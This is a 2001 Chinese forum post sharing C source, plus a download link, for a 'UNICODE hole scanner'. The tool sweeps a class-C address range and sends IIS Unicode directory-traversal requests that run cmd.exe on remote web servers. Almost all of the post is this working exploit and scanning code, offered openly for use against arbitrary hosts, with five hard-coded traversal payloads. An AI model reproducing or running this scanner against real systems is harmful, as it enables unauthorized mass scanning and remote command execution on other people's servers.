发信人: maxview()
整理人: williamlong(2001-05-18 12:19:39), 站内信件
|
最近有朋友要这个程序的执行文件,我编译了一个,做到了主页上,有需要的朋友请自行去下载:http://idwin.163.net/index.htm
这个版本我将IP地址的扫描设定成了一个c段,使用方法是:scan xxx.xxx.xxx.*
其中的星号是从1到255,因为程序是单线成的,所以有点慢,我会尽快改进
另外这次还增加了另外几个UNICODE,这样就将程序所能扫描的漏洞完整了
/* UNICODE hole scanner. The version is 0.5 */
#include <stdio.h>
#include <string.h>
#include <winsock.h>
main(int argc,char *argv[])
{
if(argc!=2){
printf("\nUNICODE hole scanner by Maxview. Ver 0.5\n");
printf("Useage : scan [IP address] (C-class)\n");
printf("Example: scan 202.100.2.* OR scan 211.17.65.*\n");
return(1);
}
int sock;
struct sockaddr_in blah;
struct hostent *he;
WSADATA wsaData;
WORD wVersionRequested=MAKEWORD(1,1);
char buff[1024];
char *exA="GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0\n\n";
char *exB="GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0\n\n";
char *exC="GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0\n\n";
char *exD="GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0\n\n";
char *exE="GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0\n\n";
char *fmsg="HTTP/1.1 200 OK";
char host[1000];
char net[1000];
int i;
strncpy(host,argv[1],999);
if (host[strlen(host)-1]=='*')
{
host[strlen(host)-1]=0x0;
}
for (i=1; i<256; i++)
{
sprintf(net, "%s%d", host, i);
if (WSAStartup(wVersionRequested , &wsaData)){
printf("Winsock Initialization failed.\n");
exit(1);
}
if ((sock=socket(AF_INET,SOCK_STREAM,0))==INVALID_SOCKET){
printf("Can not create socket.\n");
exit(1);
}
sock = socket(AF_INET,SOCK_STREAM,0);
blah.sin_family = AF_INET;
blah.sin_port = htons(80);
blah.sin_addr.s_addr= inet_addr(net);
if ((he=gethostbyname(net))!=NULL){
memcpy((char *)&blah.sin_addr.s_addr,he->h_addr,he->h_length);
}
else{
if((blah.sin_addr.s_addr=inet_addr(net))==INADDR_NONE){
WSACleanup();
exit(1);
}
}
if (connect(sock,(struct sockaddr*)&blah,sizeof(blah))==0){
send(sock,exA,strlen(exA),0);
recv(sock,buff,sizeof(buff),0);
if(strstr(buff,fmsg)!=NULL){
printf("\nFound an UNICODE-A hole in %s %s\n", net, exA);
}
else printf(".");
send(sock,exB,strlen(exB),0);
recv(sock,buff,sizeof(buff),0);
if(strstr(buff,fmsg)!=NULL){
printf("\nFound an UNICODE-B hole in %s %s\n", net, exB);
}
else printf(".");
send(sock,exC,strlen(exC),0);
recv(sock,buff,sizeof(buff),0);
if(strstr(buff,fmsg)!=NULL){
printf("\nFound an UNICODE-C hole in %s %s\n", net, exC);
}
else printf(".");
send(sock,exD,strlen(exD),0);
recv(sock,buff,sizeof(buff),0);
if(strstr(buff,fmsg)!=NULL){
printf("\nFound an UNICODE-D hole in %s %s\n", net, exD);
}
else printf(".");
send(sock,exE,strlen(exE),0);
recv(sock,buff,sizeof(buff),0);
if(strstr(buff,fmsg)!=NULL){
printf("\nFound an UNICODE-E hole in %s %s\n", net, exE);
}
else printf(".");
}
else printf("Can not connect the address.\n");
closesocket(sock);
WSACleanup();
}
} |
|